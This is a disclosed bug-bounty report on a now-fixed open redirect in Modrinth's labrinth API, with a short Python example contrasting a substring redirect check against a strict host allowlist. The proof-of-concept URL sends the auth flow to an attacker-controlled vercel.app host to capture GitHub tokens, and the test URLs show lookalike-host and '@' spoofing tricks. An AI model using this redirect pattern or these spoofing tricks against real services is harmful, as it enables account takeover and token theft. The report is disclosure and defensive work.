Account Takeover in modrinth/labrinth

Status: Valid

Reported on Oct 15th 2022


Description

A malicious actor can set up a website under the vercel.app domain and then change its subdomain to something containing "modrinth". That is enough to turn https://api.modrinth.com/v2/auth/init?url=ATTACKER_URL into an open redirect, letting the attacker steal the GitHub token and take over the account completely.

Proof of Concept

https://api.modrinth.com/v2/auth/init?url=https://test-modrinth.vercel.app/api/hello

Impact

This vulnerability allows full account takeover. The user can reset the token of their account, but until they do the attacker retains access to it.
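As an added illustration (not code from the report or from labrinth), the script below contrasts a substring check of the kind the report describes with an exact host allowlist over a parsed URL; the allowlist hosts, function names and test URLs other than the proof of concept are assumptions constructed for the example.

```python
from urllib.parse import urlsplit

# Assumed allowlist for this example; the real service's list is not on the page.
ALLOWED_HOSTS = {"modrinth.com", "www.modrinth.com", "api.modrinth.com"}


def weak_redirect_check(url: str) -> bool:
    """Substring match of the kind the report describes: any URL whose text
    contains "modrinth" is accepted, so test-modrinth.vercel.app passes."""
    return "modrinth" in url


def strict_redirect_check(url: str) -> bool:
    """Parse the URL, require https, and compare the host exactly against
    the allowlist. Note: host.endswith("modrinth.com") without the leading
    dot would still accept evilmodrinth.com, so exact membership is used."""
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if parts.scheme != "https":
        return False
    # Userinfo lets https://modrinth.com@evil.example/ look allowlisted to a
    # naive prefix check; reject it rather than rely on hostname stripping it.
    if "@" in parts.netloc:
        return False
    host = parts.hostname  # lower-cased, port removed
    return host is not None and host in ALLOWED_HOSTS


# Constructed cases; the first is the URL from the report's proof of concept.
CASES = [
    "https://test-modrinth.vercel.app/api/hello",
    "https://modrinth.com/dashboard",
    "https://modrinth.com@evil.example/",
    "https://modrinth.com.evil.example/",
    "https://evilmodrinth.com/",
    "http://modrinth.com/",
]


def evaluate(urls=CASES):
    """Return {url: (weak_result, strict_result)} for each candidate."""
    return {u: (weak_redirect_check(u), strict_redirect_check(u)) for u in urls}


if __name__ == "__main__":
    for url, (weak, strict) in evaluate().items():
        print(f"weak={weak!s:5} strict={strict!s:5} {url}")
```

Every constructed case passes the substring check, while only the genuine modrinth.com URL passes the allowlist check.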

Timeline

modrinth/labrinth maintainer acknowledged this report
Emma Alexia validated this vulnerability
ZeoNight was awarded the disclosure bounty
Emma Alexia marked this as fixed with commit 07edb9 (fixed version: not applicable)
This vulnerability will not receive a CVE
Emma Alexia published this vulnerability